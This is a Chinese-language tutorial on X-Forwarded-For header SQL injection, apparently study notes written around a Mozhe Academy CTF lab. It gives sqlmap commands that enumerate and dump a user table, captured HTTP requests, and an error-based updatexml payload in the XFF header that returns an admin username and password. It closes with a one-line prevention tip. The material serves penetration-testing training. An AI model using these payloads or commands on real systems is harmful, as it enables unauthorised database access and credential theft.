3.5 使用sqlmap进行X-Forwarded-For头文件注入
3.5.1 X-Forwarded注入简介
1. X-Forwarded-For简介
X-Forwarded-For简称为XFF头,它代表客户端,也就是HTTP的请求端真实的IP地址,只有在通过了HTTP代理或负载均衡服务器的时候才会添加此项,它不是RFC中定义的标准请求头信息,在squid缓存代理服务器开放文档中可以找到该项的详细介绍
标准格式:X-Forwarded-For:client1,proxy1,proxy2
可以参考:https://blog.csdn.net/zyhmz/article/details/82505344
2. 漏洞分析
(1) 从表中查询用户名,密码及登录IP地址
(2) 使用sanitize()函数验证登录变量
(3) 使用ip_adr()方法获取IP地址
(4) HTTP_X_FORWARDED_FOR SQL注入
可以参考:https://blog.csdn.net/xiao__gui/article/details/83054462
总结:最终形成的X-Forwarded-For头注入是因为客户端输入的参数带入到后端与数据库进行交互,且没有对输入的字符做验证,例如:客户端登录的时候使用X-Forwarded-For伪造一个IP进行提交,那么这个时候后端会记录这个X-Forwarded-For的IP地址并写入数据库,这一过程没有对输入源进行任何过滤,导致可以执行任意SQL语句
3. SQL注入测试
(1) 手工注入,这里我就演示了,后期我会针对SQL注入漏洞进行专题讲解完成sqlilab,所以目前这本书主要是以工具sqlmap为主。
(2) 作者提到用sqlmap进行抓包注入
sqlmapy.py -r bmfx.txt --tamper=xforwardedfor.py -v 3
3.5.2 X-Forwarded-For CTF 注入实战
1. CTF关卡
这里CTF关卡是直接使用墨者学院,对应的CTF网站如下:
https://www.mozhe.cn 需要注册账户才可以玩
对应的X-Forwarded-For注入漏洞实战
https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe
启动靶场,根据提示访问即可
开启Burpsuite ,配置好其代理端口8080,浏览器访问靶场 http://219.153.49.228:44549
发现是个登录窗口,输入admin/admin 登录,将抓到包通过burpsuite发送到repeter然后添加X-Forwarded-For进行测试
丢一个单引号发现mysql数据库的错误,可以判断是存在sql注入漏洞,此时便可通过如下方式开始使用sqlmap进行注入
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" --dbs
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" -D webcalendar --tables
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" -D webcalendar -T user --columns
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" -D webcalendar -T user -C username,password --dump
POST /index.php HTTP/1.1
Host: 219.153.49.228:44549
Content-Length: 21
Cache-Control: max-age=0
Origin: http://219.153.49.228:44549
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://219.153.49.228:44549/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: 2.3.3.3
username=a&password=a
==========================================================================================================
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" --level 3 -D webcalendar -T user -C id,username,password --dump
POST /index.php HTTP/1.1
Referer: http://219.153.49.228:41635/index.php
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
Accept-Encoding: gzip, deflate
Content-Length: 28
Host: 219.153.49.228:41635
Connection: close
X-Forwarded-For: *
username=admin&password=ssss
============================================================================================================
一步到位
POST /index.php HTTP/1.1
Host: 219.153.49.228:44549
Content-Length: 21
Cache-Control: max-age=0
Origin: http://219.153.49.228:44549
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://219.153.49.228:44549/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Forwarded-For: 2.3.4.5' and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from user),0x7e),1) or '1'='1
username=a&password=a
HTTP/1.1 200 OK
Date: Tue, 16 Jun 2020 09:30:02 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.14
Content-Length: 39
Connection: close
Content-Type: text/html
XPATH syntax error: '~admin~568328384~'
上述是直接一步到位获取账号和密码
=======================================================================================================
参考:
https://galiyy.github.io/2019/08/28/CTF%E9%9D%B6%E5%9C%BA%E8%AE%AD%E7%BB%83-SQL%E6%B3%A8%E5%85%A5%EF%BC%88X-Forwarded-For%E6%B3%A8%E5%85%A5%EF%BC%89/
3.5.3 总结与防范
1. X-Forwarded-For利用总结
(1) 通过页面返回结果来判断,如果其中涉及到IP地址,则很有可能存在X-Forwarded-For注入
(2) 通过Burpsuite对页面文件进行抓包并保存
(3) 使用sqlmap语句进行SQL注入测试
sqlmap.py -r bmfx.txt -p "X-Forwarded-For" 这里的X-Forwarded-For需要加*或者IP地址,不然注入不出来
2. X-Forwarded-For注入防范
在使用查询语句的时候,一定要进行过滤,严格控制参数的输入